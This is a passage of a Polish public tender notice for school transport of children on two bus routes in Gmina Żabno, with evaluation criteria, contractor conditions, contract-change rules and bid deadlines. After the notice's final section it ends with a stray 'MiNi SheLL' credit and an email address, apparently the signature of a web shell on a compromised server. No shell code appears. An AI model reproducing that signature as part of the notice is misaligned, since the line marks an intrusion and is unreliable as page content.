wynagrodzenia - 30 dni od dostarczenia Zamawiającemu prawidłowo wystawionej faktury – otrzyma 40 punktów,<br/>b)	Termin płatności wynagrodzenia - 21 dni od dostarczenia Zamawiającemu prawidłowo wystawionej faktury – otrzyma 20 punktów.<br/>c)	Termin płatności wynagrodzenia - 14 dni od dostarczenia Zamawiającemu prawidłowo wystawionej faktury – otrzyma 0 punktów.<br/><br/><br/>Zamawiający informuje, iż za najdłuższy realny okres gwarancji jakości przyjmuje okres 60 miesięcy. <br/>Minimalny natomiast wymagany przez Zamawiającego okres gwarancji wynosi 36 miesięcy. <br/><br/>c)	Całkowita „Liczba punktów”, zostanie obliczona w następujący sposób:<br/>Lp = Pc + Pt, gdzie:<br/><br/>Lp - całkowita liczba punktów uzyskanych przez ofertę<br/>Pc - liczba punktów uzyskanych w kryterium cena <br/>Pt - liczba punktów uzyskanych w termin płatności wynagrodzenia <br/><br/>3)	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.<br/>4)	Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona <br/>z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności wynagrodzenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> c)	Część 3 pn. „Trasa III”<br/>	Przedmiotem zamówienia w tej części jest wykonanie usługi transportowej autobusem na trasie Żabno (Warszawska), Niedomice (Długa), Ilkowice ( Nowa) Łęg Tarnowski ( Parkowa, Witosa) Bobrowniki Wielkie (Bobrowska), Łęg Tarnowski ( Górna, Witosa), SOSW- Romanowicza 9, LO Banderowskiego 4, ZNSS Tarnów – Okrężna 4a, <br/>	liczba dzieci przewidzianych do dowozu - 13, <br/>	łączna ilość kilometrów przewidzianych do przejechania (jednorazowy przejazd)- 69,4 km,<br/>	Liczba dni dowozu dzieci w tym okresie wynosi 108.<br/>3)	Wykonawca musi zapewnić uczniom bezpieczny przewóz tzn. odpowiednie warunki bezpieczeństwa i higieny, w szczególności zgodnie z obowiązującymi wytycznymi służb sanitarnych, w związku z zapobieganiem rozprzestrzeniania się pandemii COVID-19.<br/>4)	W każdym autobusie, na każdej trasie, Wykonawca zobowiązany jest do zapewnienia co najmniej jednej osoby sprawującej opiekę wychowawczą nad przewożonymi uczniami. <br/>5)	Do obowiązku osoby sprawującej opiekę wychowawczą nad uczniami będzie należało:<br/>a)	sprawdzanie stanu liczbowego uczniów wewnątrz pojazdu,<br/>b)	pilnowanie ładu i porządku przy wsiadaniu i zajmowaniu przez uczniów miejsc w autobusie,<br/>c)	ustalenie sposobu porozumiewania się z kierowcą w czasie jazdy,<br/>d)	zwracanie uwagi na właściwe zachowanie się uczniów w czasie przewozu,<br/>e)	zapewnienie bezpiecznego wsiadania, wysiadania z pojazdu,<br/>f)	w przypadku stwierdzenia sytuacji zagrażającej bezpieczeństwu uczniów nie dopuszczenie do ich przewozu.<br/>6)	Wykonawca określi w formularzu ofertowym ryczałtową cenę brutto za 1 km wykonania dowozu oraz całkowitą szacunkową cenę za realizację danej części zamówienia na którą składa ofertę, ustaloną zgodnie ze wzorem określonym <br/>w Rozdziale II ust. 12 SWZ. Zamawiający wymaga od Wykonawcy podania ceny za realizację poszczególnych części zamówienia.<br/>7)	Wykonawca może przewozić tylko dzieci z terenu Gminy Żabno wskazane przez Zakład Obsługi Samorządowych Szkół i Przedszkoli w Żabnie – nie dopuszcza się przewozów łączonych.<br/><br/>UWAGA!<br/> Dla poszczególnych tras podano ilość efektywnych przejechanych kilometrów, tj. kilometrów kiedy przewożone są dzieci. Nie uwzględniono kilometrów „pustego przebiegu”, tj. przejazdu bez dzieci.<br/><br/>8)	W trakcie realizacji zamówienia Wykonawca zobowiązany jest używać wyłącznie pojazdów, które są dopuszczone do ruchu zgodnie z obowiązującymi przepisami prawa, posiadają ważne badania techniczne oraz ubezpieczenia OC i NNW, jak również przystosowane są do przewozu osób.<br/>9)	Wykonawca w celu zapewnienia sprawności technicznej pojazdów, zobowiązany jest przestrzegać przepisów określonych w Rozporządzeniu Ministra Infrastruktury z dnia 31 grudnia 2002 roku w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz. U. z 2016 r., poz. 2022).<br/>10)	W przypadku awarii autobusu Wykonawca zobowiązany jest do podstawienia autobusu zastępczego będącego w dyspozycji wykonawcy, w czasie nie dłuższym niż 60 minut od wystąpienia awarii.<br/>11)	Dokumenty wymienione w ust. 8 Wykonawca udostępni Zamawiającemu na każde jego wezwanie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-03 do 2022-06-24</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">2)	Sposób dokonywania oceny:<br/>a)	Sposób oceny ofert w kryterium cena (Pc):<br/>Pc = (Cbn /Cb) x 60 punktów<br/><br/>Gdzie: Pc - liczba punktów<br/>Cbn - najniższa ze wszystkich ofert cena ofertowa brutto;<br/>Cb - proponowana w danej ofercie cena ofertowa brutto.<br/><br/>b)	Sposób oceny ofert w kryterium termin płatności wynagrodzenia (Pt):<br/> <br/>Wykonawca który zadeklaruje w ofercie: <br/>a)	Termin płatności wynagrodzenia - 30 dni od dostarczenia Zamawiającemu prawidłowo wystawionej faktury – otrzyma 40 punktów,<br/>b)	Termin płatności wynagrodzenia - 21 dni od dostarczenia Zamawiającemu prawidłowo wystawionej faktury – otrzyma 20 punktów.<br/>c)	Termin płatności wynagrodzenia - 14 dni od dostarczenia Zamawiającemu prawidłowo wystawionej faktury – otrzyma 0 punktów.<br/><br/><br/>Zamawiający informuje, iż za najdłuższy realny okres gwarancji jakości przyjmuje okres 60 miesięcy. <br/>Minimalny natomiast wymagany przez Zamawiającego okres gwarancji wynosi 36 miesięcy. <br/><br/>c)	Całkowita „Liczba punktów”, zostanie obliczona w następujący sposób:<br/>Lp = Pc + Pt, gdzie:<br/><br/>Lp - całkowita liczba punktów uzyskanych przez ofertę<br/>Pc - liczba punktów uzyskanych w kryterium cena <br/>Pt - liczba punktów uzyskanych w termin płatności wynagrodzenia <br/><br/>3)	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.<br/>4)	Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona <br/>z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności wynagrodzenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> d)	Część 4 pn. „Trasa IV”<br/>	Przedmiotem zamówienia w tej części jest wykonanie usługi transportowej pojazdem na trasie Siedliszowice, Otfinów, Nieciecza, Podlesie Dębowe, Żabno (ks. Jarosza), Łęg Tarnowski (Witosa) - PP Niedomice, Niedomice (Długa) – Ośrodek Wierzchosławice-Dwudniaki, Ośrodek Jadowniki Mokre,<br/>	liczba dzieci przewidzianych dowozu - 8, <br/>	łączna ilość kilometrów przewidzianych do przejechania (jednorazowy przejazd) - 130,6 km,<br/>	Liczba dni dowozu dzieci w tym okresie wynosi 108.<br/><br/>3)	Wykonawca musi zapewnić uczniom bezpieczny przewóz tzn. odpowiednie warunki bezpieczeństwa i higieny, w szczególności zgodnie z obowiązującymi wytycznymi służb sanitarnych, w związku z zapobieganiem rozprzestrzeniania się pandemii COVID-19.<br/>4)	W każdym pojeździe na każdej trasie, Wykonawca zobowiązany jest do zapewnienia co najmniej jednej osoby sprawującej opiekę wychowawczą nad przewożonymi uczniami. <br/>5)	Do obowiązku osoby sprawującej opiekę wychowawczą nad uczniami będzie należało:<br/>a)	sprawdzanie stanu liczbowego uczniów wewnątrz pojazdu,<br/>b)	pilnowanie ładu i porządku przy wsiadaniu i zajmowaniu przez uczniów miejsc w pojeździe,<br/>c)	ustalenie sposobu porozumiewania się z kierowcą w czasie jazdy,<br/>d)	zwracanie uwagi na właściwe zachowanie się uczniów w czasie przewozu,<br/>e)	zapewnienie bezpiecznego wsiadania, wysiadania z pojazdu,<br/>f)	w przypadku stwierdzenia sytuacji zagrażającej bezpieczeństwu uczniów nie dopuszczenie do ich przewozu.<br/>6)	Wykonawca określi w formularzu ofertowym ryczałtową cenę brutto za 1 km wykonania dowozu oraz całkowitą szacunkową cenę za realizację danej części zamówienia na którą składa ofertę, ustaloną zgodnie ze wzorem określonym <br/>w Rozdziale II ust. 12 SWZ. Zamawiający wymaga od Wykonawcy podania ceny za realizację poszczególnych części zamówienia.<br/>7)	Wykonawca może przewozić tylko dzieci z terenu Gminy Żabno wskazane przez Zakład Obsługi Samorządowych Szkół i Przedszkoli w Żabnie – nie dopuszcza się przewozów łączonych.<br/><br/>UWAGA!<br/> Dla poszczególnych tras podano ilość efektywnych przejechanych kilometrów, tj. kilometrów kiedy przewożone są dzieci. Nie uwzględniono kilometrów „pustego przebiegu”, tj. przejazdu bez dzieci.<br/><br/>8)	W trakcie realizacji zamówienia Wykonawca zobowiązany jest używać wyłącznie pojazdów, które są dopuszczone do ruchu zgodnie z obowiązującymi przepisami prawa, posiadają ważne badania techniczne oraz ubezpieczenia OC i NNW, jak również przystosowane są do przewozu osób.<br/>9)	Wykonawca w celu zapewnienia sprawności technicznej pojazdów, zobowiązany jest przestrzegać przepisów określonych w Rozporządzeniu Ministra Infrastruktury z dnia 31 grudnia 2002 roku w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz. U. z 2016 r., poz. 2022).<br/>10)	W przypadku awarii pojazdu Wykonawca zobowiązany jest do podstawienia pojazdu zastępczego będącego w dyspozycji wykonawcy, w czasie nie dłuższym niż 60 minut od wystąpienia awarii.<br/>11)	Dokumenty wymienione w ust. 8 Wykonawca udostępni Zamawiającemu na każde jego wezwanie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-03 do 2022-06-24</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">2)	Sposób dokonywania oceny:<br/>a)	Sposób oceny ofert w kryterium cena (Pc):<br/>Pc = (Cbn /Cb) x 60 punktów<br/><br/>Gdzie: Pc - liczba punktów<br/>Cbn - najniższa ze wszystkich ofert cena ofertowa brutto;<br/>Cb - proponowana w danej ofercie cena ofertowa brutto.<br/><br/>b)	Sposób oceny ofert w kryterium termin płatności wynagrodzenia (Pt):<br/> <br/>Wykonawca który zadeklaruje w ofercie: <br/>a)	Termin płatności wynagrodzenia - 30 dni od dostarczenia Zamawiającemu prawidłowo wystawionej faktury – otrzyma 40 punktów,<br/>b)	Termin płatności wynagrodzenia - 21 dni od dostarczenia Zamawiającemu prawidłowo wystawionej faktury – otrzyma 20 punktów.<br/>c)	Termin płatności wynagrodzenia - 14 dni od dostarczenia Zamawiającemu prawidłowo wystawionej faktury – otrzyma 0 punktów.<br/><br/><br/>Zamawiający informuje, iż za najdłuższy realny okres gwarancji jakości przyjmuje okres 60 miesięcy. <br/>Minimalny natomiast wymagany przez Zamawiającego okres gwarancji wynosi 36 miesięcy. <br/><br/>c)	Całkowita „Liczba punktów”, zostanie obliczona w następujący sposób:<br/>Lp = Pc + Pt, gdzie:<br/><br/>Lp - całkowita liczba punktów uzyskanych przez ofertę<br/>Pc - liczba punktów uzyskanych w kryterium cena <br/>Pt - liczba punktów uzyskanych w termin płatności wynagrodzenia <br/><br/>3)	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.<br/>4)	Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona <br/>z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności wynagrodzenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, zamawiający określa warunki udziału w postępowaniu dla każdej części zamówienia dotyczące:<br/><br/>1)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, <br/>o ile wynika to z odrębnych przepisów:<br/>Zamawiający uzna, spełnianie ww. warunku, jeżeli wykonawca będzie posiadał ważną przez cały okres świadczenia usługi licencję na wykonywanie krajowego transportu drogowego w zakresie przewozu osób wydaną na podstawie ustawy z dnia 6 września 2001 r. o transporcie drogowym (Dz. U. z 2021 poz. 919). <br/><br/>W przypadku ubiegania się o udzielenie zamówienia przez Wykonawców występujących wspólnie, dla wykazania spełnienia tego warunku wystarczy, że jeden z członków konsorcjum będzie dysponował wymaganymi uprawnieniami. Konsorcjum musi zagwarantować, że właśnie ten konsorcjant, który posiada uprawnienia, będzie faktycznie realizował zamówienie.<br/><br/>W celu wykazania braku podstaw do wykluczenia z postępowania Wykonawca przekaże Zamawiającemu wraz z ofertą oświadczenie na podstawie art. 125 ust. 1 Pzp (sporządzone według załącznika nr 2 do SWZ). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W<br/>takim przypadku:•Wykonawcy występujący wspólnie są zobowiązani do ustanowienia<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w<br/>postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.• Wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie z pełnomocnikiem.Oświadczenie potwierdzające brak podstaw wykluczenia wykonawcy oraz<br/>spełnianie warunków udziału w postępowaniu składa każdy z wykonawców wspólnie<br/>ubiegających się o zamówienie. Odnośnie do wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia mogą oni polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Dopuszczalne są następujące przypadki zmiany i warunki zmiany treści umowy, na skutek:<br/>1)	Zmiana terminu realizacji i wynagrodzenia na skutek rozszerzenia lub zawężenia trasy:<br/>a)	w przypadku zmiany szkoły/placówki, do których uczęszczają dzieci w trakcie roku szkolnego; <br/>b)	w przypadku dodania nowej szkoły/ placówki, do których uczęszczają dzieci w trakcie roku szkolnego; <br/>c)	w przypadku rezygnacji dziecka z dowozu; <br/>d)	w przypadku zastąpienia jednego dziecka innym dzieckiem; <br/>e)	w przypadku dodania dziecka, którego podanie wpłynęło w trakcie realizacji zamówienia, bez względu na adres zamieszkania dziecka (w obrębie gminy Żabno) i adres placówki do której dziecko będzie dowożone, jeżeli zmiana nie wpływa istotnie na liczbę kilometrów/zakres trasy oraz liczbę miejsc w pojeździe; <br/>f)	w przypadku zmiany adresu zamieszkania dziecka (w obrębie gminy Żabno) w trakcie roku szkolnego;<br/>2)	Zmiana terminu realizacji i wynagrodzenia na skutek zmiany częstotliwości kursów, liczby przewozów, terminów wykonywania usługi w przypadku gdy jest to podyktowane obiektywnymi czynnikami niemożliwymi do przewidzenia (np. rezygnacja dziecka z dowozu); 3)	Zmiana terminu realizacji i wynagrodzenia na skutek zawieszenia świadczenia usług na czas określony w szczególności w razie choroby dziecka, innych nieprzewidzianych okoliczności uniemożliwiających uczęszczanie dziecka do szkół, <br/>4)	Zmiana terminu realizacji i wynagrodzenia na skutek okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, tj. spowodowanych: <br/>a)	zmianą powszechnie obowiązujących przepisów prawa w takim zakresie, w jakim będzie to niezbędne w celu dostosowania postanowień umowy do zaistniałego stanu prawnego lub faktycznego,<br/>b)	siłą wyższą - rozumianą jako wystąpienie zdarzenia nadzwyczajnego, zewnętrznego, niemożliwego do przewidzenia i zapobieżenia, którego nie dało się uniknąć nawet przy zachowaniu najwyższej staranności, a które uniemożliwia Wykonawcy wykonanie jego zobowiązania w całości lub części. <br/>5)	zmiany postanowień umowy w przypadkach:<br/>a)	zmian wynikających z przekształceń własnościowych,<br/>b)	zmian organizacyjno-technicznych,<br/>c)	zmiany adresów,<br/>d)	zmiany zakresu wykonywanych usług oraz wynagrodzenia Wykonawcy, na skutek wystąpienia konieczności wykonania zakresu usług, w tym tożsamych z określonymi w przedmiocie zamówienia przekraczającego wymiar pierwotnie ustalony w umowie,<br/>e)	zmiany danych związanych z obsługą administracyjno- organizacyjną umowy, (danych teleadresowych Wykonawcy; Zamawiającego) - zmiana ta następuje poprzez pisemne<br/>zgłoszenie tego faktu drugiej stronie i nie wymaga zawarcia aneksu do umowy<br/>f)	przekształcenia Wykonawcy w związku z sukcesją generalną, przekształceniami, dziedziczeniem spółek handlowych zgodnie z KSH, a także sukcesją z mocy prawa, zgodnie z obowiązującymi przepisami (następstwa prawne) winno nastąpić w formie aneksu do umowy.<br/>2.	Ponadto Zamawiający zastrzega sobie prawo zmiany terminu realizacji i wynagrodzenia na skutek zmiany tras przewozu dzieci, ilości przewozów w tygodniu, terminów ich wykonywania oraz liczby dzieci, ze względu na okoliczności których strony nie mogły przewidzieć w chwili zawarcia umowy, a podyktowanych potrzebami Zamawiającego, wynikającymi z realizacji obowiązku zapewnienia dzieciom dojazdu do placówek szkolnych; <br/>Warunki zmian umowy określone zostały szczegółowo w SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-22 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-22 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-20</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com